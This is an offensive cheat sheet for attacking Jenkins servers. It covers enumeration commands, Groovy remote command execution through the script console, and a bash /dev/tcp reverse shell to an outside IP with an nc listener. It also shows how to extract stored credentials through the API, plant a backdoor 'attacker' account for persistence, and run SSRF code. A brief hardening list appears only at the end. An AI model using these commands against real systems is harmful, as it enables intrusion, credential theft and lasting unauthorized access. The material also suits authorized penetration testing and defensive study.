10.-Attacking-jenkins

1. Jenkins Version Detection

• HTTP Headers:

  curl -I http://target:8080/

• Nmap Version Detection:

  nmap -sV -p 8080 <target_ip>

• Jenkins CLI Detection:

  curl http://target:8080/jenkins/cli/ | grep -i "Jenkins CLI"

---

2. Jenkins Port Enumeration

• Default HTTP: 8080

• Slave Communication: 5000

  nmap -sV -p 8080,5000 <target_ip>

---

3. Jenkins CLI Enumeration

• Help:

  java -jar jenkins-cli.jar -s http://target:8080/jenkins/ help

• List Plugins:

  java -jar jenkins-cli.jar -s http://target:8080/jenkins/ list-plugins

• List Jobs:

  java -jar jenkins-cli.jar -s http://target:8080/jenkins/ list-jobs

  • Enumerate jobs, plugins, users.

---

4. Jenkins Plugin Enumeration

• List Installed Plugins:

  curl http://target:8080/jenkins/pluginManager/

  • Common vulnerability source.

  • Vulnerability Search: Inspect plugin names, search for CVEs on NVD/Exploit-DB.

  • Example: Pipeline: Groovy plugin (CVE-2019-10352) allows arbitrary code execution.

  • Exploitation Methods: Research specific plugin CVEs and exploitation methods.

---

5. Jenkins Security Realm Enumeration

• Check Authentication Methods:

  curl http://target:8080/jenkins/configureSecurity/

  • Jenkins DB, LDAP, etc.

---

6. Jenkins API Enumeration

• API Endpoints:

  curl http://target:8080/jenkins/api/
  curl http://target:8080/jenkins/api/json

• API Token Enumeration:

  • Check for exposed tokens in API responses or configuration files.

  • Use API tokens for unauthorized access.

  • Enumerate API endpoints for sensitive data using tools like curl or python's request library.

• API Endpoint Vulnerabilities:

  • Test API endpoints for vulnerabilities (fuzzing, parameter manipulation).

  • Check for endpoints allowing command injection or file read.

---

7. Jenkins Access Control Enumeration

• Access Control Settings:

  curl http://target:8080/jenkins/configureSecurity/

---

8. Exploiting Jenkins Script Console

• Remote Command Execution:

  curl -X POST -u admin:password --data-urlencode "script=println('Exploit successful')" http://target:8080/jenkins/scriptText

• Groovy Command Execution (Linux):

  curl -X POST -d "script=println 'id'.execute()" http://target:8080/jenkins/scriptText

• Groovy Command Execution (Windows):

  curl -X POST -d "script=def cmd = 'cmd.exe /c dir'.execute(); println cmd.text" http://target:8080/jenkins/scriptText

• Reverse Shell via Groovy (Linux):

  curl -X POST -d "script=r = Runtime.getRuntime(); p = r.exec(['/bin/bash','-c','exec 5<>/dev/tcp/10.10.14.15/8443;cat <&5 | while read line; do $line 2>&5 >&5; done'] as String[]); p.waitFor()" http://target:8080/jenkins/scriptText
  nc -lvnp 8443

---

9. Exploiting Build Job Misconfigurations

• Create Malicious Job:

  java -jar jenkins-cli.jar -s http://target:8080/jenkins/ create-job exploit_job < exploit.xml

---

10. Exploiting Pipeline Misconfigurations

• Inject Malicious Groovy Script:

  java -jar jenkins-cli.jar -s http://target:8080/jenkins/ build exploit_pipeline

---

11. Extracting Credentials from Jenkins

• Extract Stored Credentials:

  curl -u admin:password http://target:8080/jenkins/credentials/store/system/domain/_/

---

12. Persistence and Post-Exploitation

• Create Backdoor User:

  curl -X POST -u admin:password --data-urlencode "script=jenkins.model.Jenkins.instance.securityRealm.createAccount('attacker', 'password')" http://target:8080/jenkins/scriptText

---

13. Unauthenticated Exploits (Public Jenkins)

• Check for Anonymous Access:

  curl http://target:8080/jenkins/

---

14. Pipeline Script Injection (Groovy RCE)

def cmd = "whoami".execute()
println cmd.text

---

15. Jenkins Slave Exploitation

• Misconfigured Slave Nodes:

  • Check for misconfigured slave nodes.

  • Insecure communication protocols, lack of access control.

  • Exploit misconfigured slaves to gain access to the Jenkins master.

---

16. Exploiting Misconfigured Webhooks

• Webhook-Triggered Jobs:

  • Identify webhook-triggered jobs.

---

17. Jenkins SSRF & External Service Interaction

def url = "http://internal-service.local:8080"
def conn = url.toURL().openConnection()
println conn.getInputStream().text

---

18. Jenkins Reverse Shell via Build Step Manipulation

• Modify Job Build Steps:

  • Modify job build steps for reverse shell.

---

19. Privilege Escalation via Misconfigured Agents

• Elevated Privileges:

  • If Jenkins agents run with elevated privileges, execute commands as a higher-privileged user.

---

20. Arbitrary File Read via Plugin Vulnerabilities

• Vulnerable Plugins:

  • Exploit vulnerable plugins like "Pipeline: Groovy" to read sensitive files.

---

Additional Exploitation Techniques

• 21. CSRF Protection Bypass:

  • Jenkins has CSRF protection, but misconfigurations may allow bypassing.

  • Common bypass methods: Referer header manipulation, token manipulation.

• 22. Authentication Bypass Details:

  • Expand on authentication bypass vulnerabilities and exploits.

  • Check for anonymous access misconfigurations.

  • Path traversal, header manipulation, session hijacking, default credentials.

• 23. Jenkins Security Hardening:

  • Keep Jenkins and plugins updated.

  • Restrict access to the script console.

  • Use strong authentication and RBAC.

  • Strong passwords, MFA, network segmentation, regular security audits, principle of least privilege.